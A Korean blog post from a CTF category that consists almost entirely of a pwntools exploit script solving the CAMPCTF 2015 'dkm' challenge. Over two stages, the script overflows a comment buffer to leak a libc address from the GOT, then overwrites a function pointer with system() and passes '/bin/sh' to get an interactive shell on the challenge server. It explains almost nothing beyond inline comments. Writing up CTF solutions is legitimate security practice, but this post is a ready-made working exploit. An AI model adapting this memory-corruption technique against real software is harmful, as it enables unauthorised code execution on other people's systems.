본문 바로가기

Games/CTF

CAMPCTF 2015 dkm

#!/usr/bin/env python

from pwn import *

context.arch = 'amd64'

elf = ELF('dkm.elf')

puts = elf.got['__libc_start_main']


#r = remote("localhost", 5555)

r = remote("challs.campctf.ccc.ac", 10102)

r.recvuntil('> ')


def send_menu(r, s):

r.send(s+'\n')

print r.recvuntil('> ')


send_menu(r, '2')

send_menu(r, '1')

send_menu(r, '0')

send_menu(r, '0')

send_menu(r, '0') # number of ssid

send_menu(r, 'no comment')


send_menu(r, '4')

send_menu(r, '0')

send_menu(r, '2')

send_menu(r, '0')

send_menu(r, '0')

send_menu(r, 'no comment')


send_menu(r, '2')

send_menu(r, '1')

send_menu(r, '0')

send_menu(r, '0')

send_menu(r, '0')

send_menu(r, 'no comment')


send_menu(r, '4')

send_menu(r, '0')

send_menu(r, '3')

send_menu(r, '0')

send_menu(r, '0')

send_menu(r, '0')


libc_start_addr = 0

SYSTEM_OFFSET = 0x23a80 # libc_start - system. brute force this offset!

show_with_wifi = 0x4009F0


# stage1> leak got

comment = 'A'*0x310

comment += pack(0) # latitude

comment += pack(0) # longitude

comment += pack(show_with_wifi) # show with wifi

comment += pack(0xdeadbeef) # edit

comment += pack(puts) # &got.puts

comment += pack(0)

r.send( comment + '\n' )

print r.recvuntil('> ')

r.send('1\n')

leak = r.recvuntil('> ')

print leak

leak = leak.split('SSID: ')[1]

libc_start_addr = int(leak[:6][::-1].encode('hex'), 16)

system_addr = libc_start_addr + SYSTEM_OFFSET

print 'libc_start at -{0}-'.format(hex(libc_start_addr))

print 'system at -{0}-'.format(hex(system_addr))


# stage2> jmp to system

send_menu(r, '4')

send_menu(r, '0')

send_menu(r, '3')

send_menu(r, '0')

send_menu(r, '0')

send_menu(r, '0')

comment = 'A'*0x310

comment += '/bin/sh\0' # latitute -> "/bin/sh"

comment += pack(0) # longitude

comment += pack(system_addr) # chage show to system

comment += pack(0xdeadbeef) # edit

comment += pack(0)

r.send( comment + '\n' )

print r.recvuntil('> ')

r.send('1\n')

r.interactive()

'Games > CTF' 카테고리의 다른 글

PlaidCTF 2016 fixedpoint  (0) 2016.04.19
PlaidCTF 2016 pzip  (0) 2016.04.19
PlaidCTF 2015 RAM  (0) 2015.11.18
화이트햇 콘테스트 2015 한글 익스플로잇 분석  (6) 2015.10.27
EKO CTF pwn200  (0) 2015.09.17